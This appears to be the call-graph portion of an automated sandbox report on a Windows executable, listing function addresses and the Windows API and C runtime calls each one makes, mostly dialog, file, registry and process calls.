SendMessageW 26958->26965 26966 7ff6fe1abed5 SendDlgItemMessageW 26958->26966 26959 7ff6fe1abeba SendMessageW 26959->26958 26967 7ff6fe1ab2cb EndDialog 26960->26967 26960->27001 26971 7ff6fe19aae0 48 API calls 26961->26971 26961->27001 27299 7ff6fe1822bc GetDlgItem 26963->27299 26970 7ff6fe1962dc 35 API calls 26965->26970 26966->26965 26967->27001 26972 7ff6fe19aae0 48 API calls 26968->26972 26974 7ff6fe1abf47 GetDlgItem 26970->26974 26975 7ff6fe1ab236 26971->26975 
26976 7ff6fe1ab313 SetDlgItemTextW 26972->26976 26973 7ff6fe1ab3b1 EndDialog 27151 7ff6fe1ab3da 26973->27151 27589 7ff6fe182520 26974->27589 27593 7ff6fe181ec4 34 API calls _handle_error 26975->27593 26980 7ff6fe1ab326 26976->26980 26979 7ff6fe1ab408 GetDlgItem 26984 7ff6fe1ab44f SetFocus 26979->26984 26985 7ff6fe1ab422 SendMessageW SendMessageW 26979->26985 26988 7ff6fe1ab340 GetMessageW 26980->26988 26980->27001 26983 7ff6fe1ab246 26987 7ff6fe1ab25c 26983->26987 26994 7ff6fe18250c SetDlgItemTextW 26983->26994 26989 7ff6fe1ab465 26984->26989 26990 7ff6fe1ab4f2 26984->26990 26985->26984 26987->27001 27007 7ff6fe1ac363 26987->27007 26996 7ff6fe1ab35e IsDialogMessageW 26988->26996 26988->27001 26997 7ff6fe19aae0 48 API calls 26989->26997 27313 7ff6fe188d04 26990->27313 26991 7ff6fe1abcc5 26998 7ff6fe19aae0 48 API calls 26991->26998 26992 7ff6fe181fa0 31 API calls 26992->27001 26994->26987 26996->26980 27002 7ff6fe1ab373 TranslateMessage DispatchMessageW 26996->27002 27003 7ff6fe1ab46f 26997->27003 27004 7ff6fe1abcd6 SetDlgItemTextW 26998->27004 27000 7ff6fe1ab52c 27323 7ff6fe1aef80 27000->27323 27001->26956 27002->26980 27013 7ff6fe18129c 33 API calls 27003->27013 27008 7ff6fe19aae0 48 API calls 27004->27008 27009 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27007->27009 27014 7ff6fe1abd08 27008->27014 27015 7ff6fe1ac368 27009->27015 27012 7ff6fe19aae0 48 API calls 27019 7ff6fe1ab555 27012->27019 27020 7ff6fe1ab498 27013->27020 27030 7ff6fe18129c 33 API calls 27014->27030 27025 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27015->27025 27022 7ff6fe19da98 48 API calls 27019->27022 27023 7ff6fe1af0a4 24 API calls 27020->27023 27028 7ff6fe1ab568 27022->27028 27029 7ff6fe1ab4a5 27023->27029 27032 7ff6fe1ac36e 27025->27032 27337 7ff6fe1af0a4 27028->27337 27029->27015 27044 7ff6fe1ab4e8 27029->27044 27037 7ff6fe1abd31 27030->27037 27043 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27032->27043 27041 7ff6fe1abdda 27037->27041 
27071 7ff6fe18129c 33 API calls 27037->27071 27052 7ff6fe19aae0 48 API calls 27041->27052 27053 7ff6fe1ac374 27043->27053 27066 7ff6fe1ab5ec 27044->27066 27351 7ff6fe1afa80 27044->27351 27049 7ff6fe181fa0 31 API calls 27064 7ff6fe1ab586 27049->27064 27069 7ff6fe1abde4 27052->27069 27070 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27053->27070 27061 7ff6fe1ab61a 27364 7ff6fe192f58 27061->27364 27064->27032 27064->27044 27066->27061 27594 7ff6fe1932a8 27066->27594 27081 7ff6fe18129c 33 API calls 27069->27081 27075 7ff6fe1ac37a 27070->27075 27076 7ff6fe1abd7f 27071->27076 27083 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27075->27083 27085 7ff6fe19aae0 48 API calls 27076->27085 27079 7ff6fe1ab634 GetLastError 27080 7ff6fe1ab64c 27079->27080 27376 7ff6fe197fc4 27080->27376 27082 7ff6fe1abe0d 27081->27082 27097 7ff6fe18129c 33 API calls 27082->27097 27088 7ff6fe1ac380 27083->27088 27089 7ff6fe1abd8a 27085->27089 27087 7ff6fe1ab60e 27597 7ff6fe1a9d90 12 API calls _handle_error 27087->27597 27098 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27088->27098 27094 7ff6fe181150 33 API calls 27089->27094 27099 7ff6fe1abda2 27094->27099 27096 7ff6fe1ab65e 27101 7ff6fe1ab674 27096->27101 27102 7ff6fe1ab665 GetLastError 27096->27102 27104 7ff6fe1abe4e 27097->27104 27105 7ff6fe1ac386 27098->27105 27110 7ff6fe182034 33 API calls 27099->27110 27103 7ff6fe1ab71c 27101->27103 27107 7ff6fe1ab72b 27101->27107 27108 7ff6fe1ab68b GetTickCount 27101->27108 27102->27101 27103->27107 27123 7ff6fe1abb79 27103->27123 27116 7ff6fe181fa0 31 API calls 27104->27116 27109 7ff6fe18255c 61 API calls 27105->27109 27113 7ff6fe1aba50 27107->27113 27120 7ff6fe196454 34 API calls 27107->27120 27379 7ff6fe184228 27108->27379 27112 7ff6fe1ac3e4 27109->27112 27114 7ff6fe1abdbe 27110->27114 27117 7ff6fe1ac3e8 27112->27117 27126 7ff6fe1ac489 GetDlgItem SetFocus 27112->27126 27153 7ff6fe1ac3fd 27112->27153 27113->26973 27606 7ff6fe18bd0c 33 API calls 27113->27606 
27121 7ff6fe181fa0 31 API calls 27114->27121 27124 7ff6fe1abe78 27116->27124 27132 7ff6fe1b2320 _handle_error 8 API calls 27117->27132 27127 7ff6fe1ab74e 27120->27127 27128 7ff6fe1abdcc 27121->27128 27138 7ff6fe19aae0 48 API calls 27123->27138 27130 7ff6fe181fa0 31 API calls 27124->27130 27125 7ff6fe1aba75 27607 7ff6fe181150 27125->27607 27136 7ff6fe1ac4ba 27126->27136 27598 7ff6fe19b914 102 API calls 27127->27598 27135 7ff6fe181fa0 31 API calls 27128->27135 27129 7ff6fe1ab6ba 27137 7ff6fe181fa0 31 API calls 27129->27137 27139 7ff6fe1abe83 27130->27139 27141 7ff6fe1aca97 27132->27141 27135->27041 27149 7ff6fe18129c 33 API calls 27136->27149 27143 7ff6fe1ab6c8 27137->27143 27144 7ff6fe1abba7 SetDlgItemTextW 27138->27144 27145 7ff6fe181fa0 31 API calls 27139->27145 27140 7ff6fe1aba8a 27146 7ff6fe19aae0 48 API calls 27140->27146 27142 7ff6fe1ab768 27148 7ff6fe19da98 48 API calls 27142->27148 27389 7ff6fe192134 27143->27389 27150 7ff6fe182534 27144->27150 27145->27151 27152 7ff6fe1aba97 27146->27152 27147 7ff6fe1ac434 SendDlgItemMessageW 27154 7ff6fe1ac454 27147->27154 27155 7ff6fe1ac45d EndDialog 27147->27155 27156 7ff6fe1ab7aa GetCommandLineW 27148->27156 27157 7ff6fe1ac4cc 27149->27157 27158 7ff6fe1abbc5 SetDlgItemTextW GetDlgItem 27150->27158 27151->26992 27159 7ff6fe181150 33 API calls 27152->27159 27153->27117 27153->27147 27154->27155 27155->27117 27160 7ff6fe1ab84f 27156->27160 27161 7ff6fe1ab869 27156->27161 27611 7ff6fe1980d8 33 API calls 27157->27611 27166 7ff6fe1abbf0 GetWindowLongPtrW SetWindowLongPtrW 27158->27166 27167 7ff6fe1abc13 27158->27167 27168 7ff6fe1abaaa 27159->27168 27180 7ff6fe1820b0 33 API calls 27160->27180 27599 7ff6fe1aab54 33 API calls _handle_error 27161->27599 27163 7ff6fe1ac4e0 27169 7ff6fe18250c SetDlgItemTextW 27163->27169 27166->27167 27405 7ff6fe1ace88 27167->27405 27173 7ff6fe181fa0 31 API calls 27168->27173 27174 7ff6fe1ac4f4 27169->27174 27170 7ff6fe1ab87a 27600 7ff6fe1aab54 33 API calls _handle_error 27170->27600 27179 
7ff6fe1abab5 27173->27179 27185 7ff6fe1ac526 SendDlgItemMessageW FindFirstFileW 27174->27185 27176 7ff6fe1ab704 27182 7ff6fe19204c 100 API calls 27176->27182 27177 7ff6fe1ab6f5 GetLastError 27177->27176 27184 7ff6fe181fa0 31 API calls 27179->27184 27180->27161 27181 7ff6fe1ab88b 27601 7ff6fe1aab54 33 API calls _handle_error 27181->27601 27187 7ff6fe1ab711 27182->27187 27183 7ff6fe1ace88 162 API calls 27188 7ff6fe1abc3c 27183->27188 27189 7ff6fe1abac3 27184->27189 27190 7ff6fe1ac57b 27185->27190 27283 7ff6fe1aca04 27185->27283 27192 7ff6fe181fa0 31 API calls 27187->27192 27555 7ff6fe1af974 27188->27555 27199 7ff6fe19aae0 48 API calls 27189->27199 27200 7ff6fe19aae0 48 API calls 27190->27200 27191 7ff6fe1ab89c 27602 7ff6fe19b9b4 102 API calls 27191->27602 27192->27103 27196 7ff6fe1ab8b3 27603 7ff6fe1afbdc 33 API calls 27196->27603 27197 7ff6fe1aca81 27197->27117 27198 7ff6fe1ace88 162 API calls 27213 7ff6fe1abc6a 27198->27213 27203 7ff6fe1abadb 27199->27203 27204 7ff6fe1ac59e 27200->27204 27202 7ff6fe1acaa9 27206 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27202->27206 27214 7ff6fe18129c 33 API calls 27203->27214 27216 7ff6fe18129c 33 API calls 27204->27216 27205 7ff6fe1ab8d2 CreateFileMappingW 27208 7ff6fe1ab911 MapViewOfFile 27205->27208 27209 7ff6fe1ab953 ShellExecuteExW 27205->27209 27210 7ff6fe1acaae 27206->27210 27207 7ff6fe1abc96 27569 7ff6fe182298 GetDlgItem EnableWindow 27207->27569 27604 7ff6fe1b3640 27208->27604 27231 7ff6fe1ab974 27209->27231 27217 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27210->27217 27213->27207 27218 7ff6fe1ace88 162 API calls 27213->27218 27226 7ff6fe1abb04 27214->27226 27215 7ff6fe1ab3f5 27215->26973 27215->26991 27219 7ff6fe1ac5cd 27216->27219 27220 7ff6fe1acab4 27217->27220 27218->27207 27221 7ff6fe181150 33 API calls 27219->27221 27224 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27220->27224 27222 7ff6fe1ac5e8 27221->27222 27612 7ff6fe18e164 33 API calls 2 library calls 
27222->27612 27223 7ff6fe1ab9c3 27232 7ff6fe1ab9ef 27223->27232 27233 7ff6fe1ab9dc UnmapViewOfFile CloseHandle 27223->27233 27229 7ff6fe1acaba 27224->27229 27225 7ff6fe1abb5a 27227 7ff6fe181fa0 31 API calls 27225->27227 27226->27075 27226->27225 27227->26973 27236 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27229->27236 27230 7ff6fe1ac5ff 27234 7ff6fe181fa0 31 API calls 27230->27234 27231->27223 27239 7ff6fe1ab9b1 Sleep 27231->27239 27232->27053 27235 7ff6fe1aba25 27232->27235 27233->27232 27238 7ff6fe1ac60c 27234->27238 27237 7ff6fe181fa0 31 API calls 27235->27237 27240 7ff6fe1acac0 27236->27240 27241 7ff6fe1aba42 27237->27241 27238->27210 27243 7ff6fe181fa0 31 API calls 27238->27243 27239->27223 27239->27231 27244 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27240->27244 27242 7ff6fe181fa0 31 API calls 27241->27242 27242->27113 27246 7ff6fe1ac673 27243->27246 27245 7ff6fe1acac6 27244->27245 27248 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27245->27248 27247 7ff6fe18250c SetDlgItemTextW 27246->27247 27249 7ff6fe1ac687 FindClose 27247->27249 27250 7ff6fe1acacc 27248->27250 27251 7ff6fe1ac6a3 27249->27251 27252 7ff6fe1ac797 SendDlgItemMessageW 27249->27252 27613 7ff6fe1aa2cc 10 API calls _handle_error 27251->27613 27253 7ff6fe1ac7cb 27252->27253 27257 7ff6fe19aae0 48 API calls 27253->27257 27255 7ff6fe1ac6c6 27256 7ff6fe19aae0 48 API calls 27255->27256 27258 7ff6fe1ac6cf 27256->27258 27259 7ff6fe1ac7d8 27257->27259 27260 7ff6fe19da98 48 API calls 27258->27260 27261 7ff6fe18129c 33 API calls 27259->27261 27264 7ff6fe1ac6ec memcpy_s 27260->27264 27263 7ff6fe1ac807 27261->27263 27262 7ff6fe181fa0 31 API calls 27265 7ff6fe1ac783 27262->27265 27266 7ff6fe181150 33 API calls 27263->27266 27264->27220 27264->27262 27267 7ff6fe18250c SetDlgItemTextW 27265->27267 27268 7ff6fe1ac822 27266->27268 27267->27252 27614 7ff6fe18e164 33 API calls 2 library calls 27268->27614 27270 7ff6fe1ac839 27271 7ff6fe181fa0 31 API calls 
[Call graph residue: the function call graph of file.exe that the report renders as an interactive diagram survived here only as a flattened edge list (graph node id -> node id, function address such as 7ff6fe1ac845, symbol or API name). Only the symbol names are recoverable from it.]

Windows API calls recorded at the graph nodes: window and dialog handling (SetDlgItemTextW, GetDlgItem, SetWindowTextW, GetWindowTextW, GetWindowTextLengthW, SendMessageW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, IsDialogMessageW, ShowWindow, EndDialog, GetWindow, GetClassNameW, GetWindowLongPtrW, GetWindowRect, GetClientRect, GetSystemMetrics, GetObjectW, GetDC, GetDeviceCaps, ReleaseDC, DeleteObject); registry (RegOpenKeyExW, RegCreateKeyExW, RegSetValueExW, RegCloseKey); file system (CreateFileW, DeleteFileW, MoveFileW, MoveFileExW, CreateDirectoryW, SetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, GetTempPathW, SetCurrentDirectoryW); process and synchronization (ShellExecuteExW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, ReleaseSemaphore, DeleteCriticalSection, SetThreadExecutionState, GetLastError, RtlPcToFileHeader, RaiseException); strings and time (CompareStringW, WideCharToMultiByte, swprintf, _snwprintf, memcpy_s, GetSystemTime, SystemTimeToFileTime).

C runtime and C++ library symbols in the same graph: _handle_error, _invalid_parameter_noinfo_noreturn, std::_Xinvalid_argument, std::bad_alloc::bad_alloc, Concurrency::cancel_current_task, __std_swap_ranges_trivially_swappable.
101 API calls 28604->28607 28605 7ff6fe192428 28608 7ff6fe192bb0 101 API calls 28605->28608 28606 7ff6fe192438 28606->28598 28607->28605 28608->28606 28610 7ff6fe1afc94 28609->28610 28611 7ff6fe18129c 33 API calls 28610->28611 28622 7ff6fe185e67 28621->28622 28623 7ff6fe185ea5 28622->28623 28628 7ff6fe185eb7 28622->28628 28652 7ff6fe186084 28622->28652 28716 7ff6fe1828a4 82 API calls 2 library calls 28623->28716 28626 7ff6fe186134 28723 7ff6fe186fcc 82 API calls 28626->28723 28628->28626 28629 7ff6fe185f44 28628->28629 28717 7ff6fe186f38 33 API calls memcpy_s 28628->28717 28718 7ff6fe186d88 82 API calls 28629->28718 28630 7ff6fe1869af 28632 7ff6fe1b2320 _handle_error 8 API calls 28630->28632 28634 7ff6fe1869e4 28639 7ff6fe18612e 28639->28626 28643 7ff6fe186034 28643->28652 28644 7ff6fe1869ef 28648 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28644->28648 28706 7ff6fe1985f0 28652->28706 28653 7ff6fe186097 28656 7ff6fe185f5d 28656->28643 28656->28653 28719 7ff6fe18433c 82 API calls 2 library calls 28656->28719 28720 7ff6fe186d88 82 API calls 28656->28720 28721 7ff6fe18a1a0 109 API calls _handle_error 28656->28721 28667 7ff6fe185eb2 28667->28630 28667->28634 28667->28644 28704->28154 28707 7ff6fe198614 28706->28707 28708 7ff6fe19869a 28706->28708 28710 7ff6fe1840b0 33 API calls 28707->28710 28714 7ff6fe19867c 28707->28714 28709 7ff6fe1840b0 33 API calls 28708->28709 28708->28714 28711 7ff6fe1986b3 28709->28711 28712 7ff6fe19864d 28710->28712 28714->28639 28716->28667 28718->28656 28719->28656 28720->28656 28721->28656 28723->28667 28749 7ff6fe189be7 28741->28749 28742 7ff6fe189c1b 28743 7ff6fe1b2320 _handle_error 8 API calls 28742->28743 28744 7ff6fe189c9d 28743->28744 28744->28170 28746 7ff6fe189c83 28747 7ff6fe181fa0 31 API calls 28746->28747 28747->28742 28749->28742 28749->28746 28750 7ff6fe189cae 28749->28750 28876 7ff6fe195294 28749->28876 28894 7ff6fe19db60 28749->28894 28751 7ff6fe189cbf 28750->28751 28898 7ff6fe19da48 CompareStringW 
28750->28898 28751->28746 28753 7ff6fe1820b0 33 API calls 28751->28753 28753->28746 28765 7ff6fe195f3a 28754->28765 28826->28162 28874->28215 28875->28215 28877 7ff6fe1952d4 28876->28877 28881 7ff6fe195312 __vcrt_FlsAlloc 28877->28881 28883 7ff6fe195339 __vcrt_FlsAlloc 28877->28883 28899 7ff6fe1a13f4 CompareStringW 28877->28899 28878 7ff6fe1b2320 _handle_error 8 API calls 28880 7ff6fe195503 28878->28880 28880->28749 28881->28883 28884 7ff6fe195382 __vcrt_FlsAlloc 28881->28884 28900 7ff6fe1a13f4 CompareStringW 28881->28900 28883->28878 28884->28883 28885 7ff6fe18129c 33 API calls 28884->28885 28886 7ff6fe195439 28884->28886 28887 7ff6fe195426 28885->28887 28889 7ff6fe19551b 28886->28889 28890 7ff6fe195489 28886->28890 28890->28883 28895 7ff6fe19db73 28894->28895 28896 7ff6fe1820b0 33 API calls 28895->28896 28897 7ff6fe19db91 28895->28897 28896->28897 28897->28749 28898->28751 28899->28881 28900->28884 28960->28340 28961->28342 28962->28346 28964 7ff6fe1987af 28963->28964 28976 7ff6fe1987df 28963->28976 28965 7ff6fe1b236c 108 API calls 28964->28965 28968 7ff6fe1987ca 28965->28968 28966 7ff6fe1b236c 108 API calls 28969 7ff6fe198814 28966->28969 28971 7ff6fe1b236c 108 API calls 28968->28971 28972 7ff6fe1b236c 108 API calls 28969->28972 28970 7ff6fe198845 28973 7ff6fe19461c 108 API calls 28970->28973 28971->28976 28974 7ff6fe19882b 28972->28974 28975 7ff6fe198851 28973->28975 28977 7ff6fe19461c 28974->28977 28976->28966 28976->28974 28978 7ff6fe194632 28977->28978 28980 7ff6fe19463a 28977->28980 28979 7ff6fe19e948 108 API calls 28978->28979 28979->28980 28980->28970 28982 7ff6fe191681 28981->28982 28983 7ff6fe19163e 28981->28983 28984 7ff6fe181fa0 31 API calls 28982->28984 28990 7ff6fe1916a0 28982->28990 28983->28982 28986 7ff6fe1931bc 51 API calls 28983->28986 28984->28982 28985 7ff6fe18e600 31 API calls 28988 7ff6fe1916de 28985->28988 28986->28983 28987 7ff6fe19175b 28989 7ff6fe1b2320 _handle_error 8 API calls 28987->28989 28988->28987 28991 7ff6fe19178d 28988->28991 
28992 7ff6fe18e58a 28989->28992 28990->28985 28993 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28991->28993 28992->27948 28992->27949 28994 7ff6fe191792 28993->28994 28995->27579 28996->27586 28997->27588 28998 7ff6fe1b1491 28999 7ff6fe1b13c9 28998->28999 29000 7ff6fe1b1900 _com_raise_error 14 API calls 28999->29000 29001 7ff6fe1b1408 29000->29001 25961 7ff6fe1b03e0 25962 7ff6fe1b041f 25961->25962 25963 7ff6fe1b0497 25961->25963 25994 7ff6fe19aae0 25962->25994 25965 7ff6fe19aae0 48 API calls 25963->25965 25967 7ff6fe1b04ab 25965->25967 25969 7ff6fe19da98 48 API calls 25967->25969 25973 7ff6fe1b0442 memcpy_s 25969->25973 25971 7ff6fe1b0541 25991 7ff6fe18250c 25971->25991 25972 7ff6fe1b05cc 25977 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 25972->25977 25973->25972 25974 7ff6fe1b05c6 25973->25974 25986 7ff6fe181fa0 25973->25986 26004 7ff6fe1b7904 25974->26004 25979 7ff6fe1b05d2 25977->25979 25987 7ff6fe181fb3 25986->25987 25988 7ff6fe181fdc 25986->25988 25987->25988 25989 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 25987->25989 25988->25971 25990 7ff6fe182000 25989->25990 25992 7ff6fe182516 SetDlgItemTextW 25991->25992 25993 7ff6fe182513 25991->25993 25993->25992 25995 7ff6fe19aaf3 25994->25995 26009 7ff6fe199774 25995->26009 25998 7ff6fe19ab86 26001 7ff6fe19da98 25998->26001 25999 7ff6fe19ab58 LoadStringW 25999->25998 26000 7ff6fe19ab71 LoadStringW 25999->26000 26000->25998 26046 7ff6fe19d874 26001->26046 26139 7ff6fe1b783c 31 API calls 3 library calls 26004->26139 26006 7ff6fe1b791d 26140 7ff6fe1b7934 16 API calls abort 26006->26140 26016 7ff6fe199638 26009->26016 26012 7ff6fe1997d9 26026 7ff6fe1b2320 26012->26026 26017 7ff6fe199692 26016->26017 26018 7ff6fe199730 26016->26018 26022 7ff6fe1996c0 26017->26022 26039 7ff6fe1a0f68 WideCharToMultiByte 26017->26039 26020 7ff6fe1b2320 _handle_error 8 API calls 26018->26020 26021 7ff6fe199764 26020->26021 26021->26012 26035 7ff6fe199800 26021->26035 26025 7ff6fe1996ef 
26022->26025 26041 7ff6fe19aa88 45 API calls 2 library calls 26022->26041 26042 7ff6fe1ba270 31 API calls 2 library calls 26025->26042 26027 7ff6fe1b2329 26026->26027 26028 7ff6fe1997f2 26027->26028 26029 7ff6fe1b2550 IsProcessorFeaturePresent 26027->26029 26028->25998 26028->25999 26030 7ff6fe1b2568 26029->26030 26043 7ff6fe1b2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26030->26043 26032 7ff6fe1b257b 26044 7ff6fe1b2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26032->26044 26036 7ff6fe199840 26035->26036 26038 7ff6fe199869 26035->26038 26045 7ff6fe1ba270 31 API calls 2 library calls 26036->26045 26038->26012 26040 7ff6fe1a0faa 26039->26040 26040->26022 26041->26025 26042->26018 26043->26032 26045->26038 26062 7ff6fe19d4d0 26046->26062 26050 7ff6fe19d8e5 swprintf 26059 7ff6fe19d974 26050->26059 26076 7ff6fe1b9ef0 26050->26076 26103 7ff6fe189d78 33 API calls 26050->26103 26052 7ff6fe19d9a3 26054 7ff6fe19da17 26052->26054 26056 7ff6fe19da3f 26052->26056 26055 7ff6fe1b2320 _handle_error 8 API calls 26054->26055 26057 7ff6fe19da2b 26055->26057 26058 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26056->26058 26057->25973 26060 7ff6fe19da44 26058->26060 26059->26052 26104 7ff6fe189d78 33 API calls 26059->26104 26063 7ff6fe19d665 26062->26063 26064 7ff6fe19d502 26062->26064 26066 7ff6fe19cb80 26063->26066 26064->26063 26065 7ff6fe181744 33 API calls 26064->26065 26065->26064 26067 7ff6fe19cbb6 26066->26067 26074 7ff6fe19cc80 26066->26074 26068 7ff6fe19cbc6 26067->26068 26071 7ff6fe19cc20 26067->26071 26072 7ff6fe19cc7b 26067->26072 26068->26050 26071->26068 26105 7ff6fe1b21d0 26071->26105 26114 7ff6fe181f80 33 API calls 3 library calls 26072->26114 26115 7ff6fe182004 33 API calls std::_Xinvalid_argument 26074->26115 26077 7ff6fe1b9f4e 26076->26077 26078 7ff6fe1b9f36 26076->26078 26077->26078 26080 7ff6fe1b9f58 26077->26080 26127 7ff6fe1bd69c 15 API calls memcpy_s 26078->26127 26129 
7ff6fe1b7ef0 35 API calls 2 library calls 26080->26129 26081 7ff6fe1b9f3b 26128 7ff6fe1b78e4 31 API calls _invalid_parameter_noinfo 26081->26128 26084 7ff6fe1b2320 _handle_error 8 API calls 26086 7ff6fe1ba10b 26084->26086 26085 7ff6fe1b9f69 memcpy_s 26130 7ff6fe1b7e70 15 API calls memcpy_s 26085->26130 26086->26050 26088 7ff6fe1b9fd4 26131 7ff6fe1b82f8 46 API calls 3 library calls 26088->26131 26090 7ff6fe1b9fdd 26091 7ff6fe1b9fe5 26090->26091 26092 7ff6fe1ba014 26090->26092 26132 7ff6fe1bd90c 26091->26132 26094 7ff6fe1ba06c 26092->26094 26095 7ff6fe1ba023 26092->26095 26096 7ff6fe1ba092 26092->26096 26097 7ff6fe1ba01a 26092->26097 26098 7ff6fe1bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26094->26098 26100 7ff6fe1bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26095->26100 26096->26094 26099 7ff6fe1ba09c 26096->26099 26097->26094 26097->26095 26102 7ff6fe1b9f46 26098->26102 26101 7ff6fe1bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26099->26101 26100->26102 26101->26102 26102->26084 26103->26050 26104->26052 26107 7ff6fe1b21db 26105->26107 26106 7ff6fe1b21f4 26106->26068 26107->26106 26109 7ff6fe1b21fa 26107->26109 26116 7ff6fe1bbbc0 26107->26116 26112 7ff6fe1b2205 26109->26112 26119 7ff6fe1b2f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26109->26119 26120 7ff6fe181f80 33 API calls 3 library calls 26112->26120 26113 7ff6fe1b220b 26114->26074 26121 7ff6fe1bbc00 26116->26121 26119->26112 26120->26113 26126 7ff6fe1bf398 EnterCriticalSection 26121->26126 26127->26081 26128->26102 26129->26085 26130->26088 26131->26090 26133 7ff6fe1bd911 RtlFreeHeap 26132->26133 26137 7ff6fe1bd941 Concurrency::details::SchedulerProxy::DeleteThis 26132->26137 26134 7ff6fe1bd92c 26133->26134 26133->26137 26138 7ff6fe1bd69c 15 API calls memcpy_s 26134->26138 26136 7ff6fe1bd931 GetLastError 26136->26137 26137->26102 26138->26136 26139->26006 26147 7ff6fe1b20f0 26148 7ff6fe1b2106 
_com_error::_com_error 26147->26148 26153 7ff6fe1b4078 26148->26153 26150 7ff6fe1b2117 26158 7ff6fe1b1900 26150->26158 26154 7ff6fe1b40b4 RtlPcToFileHeader 26153->26154 26155 7ff6fe1b4097 26153->26155 26156 7ff6fe1b40cc 26154->26156 26157 7ff6fe1b40db RaiseException 26154->26157 26155->26154 26156->26157 26157->26150 26184 7ff6fe1b1558 26158->26184 26161 7ff6fe1b198b 26162 7ff6fe1b1868 DloadReleaseSectionWriteAccess 6 API calls 26161->26162 26163 7ff6fe1b1998 RaiseException 26162->26163 26164 7ff6fe1b1bb5 26163->26164 26165 7ff6fe1b1a3d LoadLibraryExA 26167 7ff6fe1b1a54 GetLastError 26165->26167 26168 7ff6fe1b1aa9 26165->26168 26166 7ff6fe1b1b85 26192 7ff6fe1b1868 26166->26192 26173 7ff6fe1b1a7e 26167->26173 26174 7ff6fe1b1a69 26167->26174 26169 7ff6fe1b1ab4 FreeLibrary 26168->26169 26171 7ff6fe1b1abd 26168->26171 26169->26171 26170 7ff6fe1b19b4 26170->26165 26170->26166 26170->26168 26170->26171 26171->26166 26172 7ff6fe1b1b1b GetProcAddress 26171->26172 26172->26166 26175 7ff6fe1b1b30 GetLastError 26172->26175 26177 7ff6fe1b1868 DloadReleaseSectionWriteAccess 6 API calls 26173->26177 26174->26168 26174->26173 26179 7ff6fe1b1b45 26175->26179 26178 7ff6fe1b1a8b RaiseException 26177->26178 26178->26164 26179->26166 26180 7ff6fe1b1868 DloadReleaseSectionWriteAccess 6 API calls 26179->26180 26181 7ff6fe1b1b67 RaiseException 26180->26181 26182 7ff6fe1b1558 _com_raise_error 6 API calls 26181->26182 26183 7ff6fe1b1b81 26182->26183 26183->26166 26185 7ff6fe1b156e 26184->26185 26186 7ff6fe1b15d3 26184->26186 26200 7ff6fe1b1604 26185->26200 26186->26161 26186->26170 26189 7ff6fe1b15ce 26191 7ff6fe1b1604 DloadReleaseSectionWriteAccess 3 API calls 26189->26191 26191->26186 26193 7ff6fe1b1878 26192->26193 26194 7ff6fe1b18d1 26192->26194 26195 7ff6fe1b1604 DloadReleaseSectionWriteAccess 3 API calls 26193->26195 26194->26164 26196 7ff6fe1b187d 26195->26196 26197 7ff6fe1b18cc 26196->26197 26198 7ff6fe1b17d8 DloadProtectSection 3 API calls 26196->26198 26199 7ff6fe1b1604 
DloadReleaseSectionWriteAccess 3 API calls 26197->26199 26198->26197 26199->26194 26201 7ff6fe1b161f 26200->26201 26202 7ff6fe1b1573 26200->26202 26201->26202 26203 7ff6fe1b1624 GetModuleHandleW 26201->26203 26202->26189 26207 7ff6fe1b17d8 26202->26207 26204 7ff6fe1b163e GetProcAddress 26203->26204 26206 7ff6fe1b1639 26203->26206 26205 7ff6fe1b1653 GetProcAddress 26204->26205 26204->26206 26205->26206 26206->26202 26209 7ff6fe1b17fa DloadProtectSection 26207->26209 26208 7ff6fe1b1802 26208->26189 26209->26208 26210 7ff6fe1b183a VirtualProtect 26209->26210 26212 7ff6fe1b16a4 VirtualQuery GetSystemInfo 26209->26212 26210->26208 26212->26210 29003 7ff6fe1b11cf 29004 7ff6fe1b1102 29003->29004 29005 7ff6fe1b1900 _com_raise_error 14 API calls 29004->29005 29006 7ff6fe1b1141 29005->29006 29006->29006 26920 7ff6fe1bbf2c 26927 7ff6fe1bbc34 26920->26927 26932 7ff6fe1bd440 35 API calls 2 library calls 26927->26932 26929 7ff6fe1bbc3f 26933 7ff6fe1bd068 35 API calls abort 26929->26933 26932->26929
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
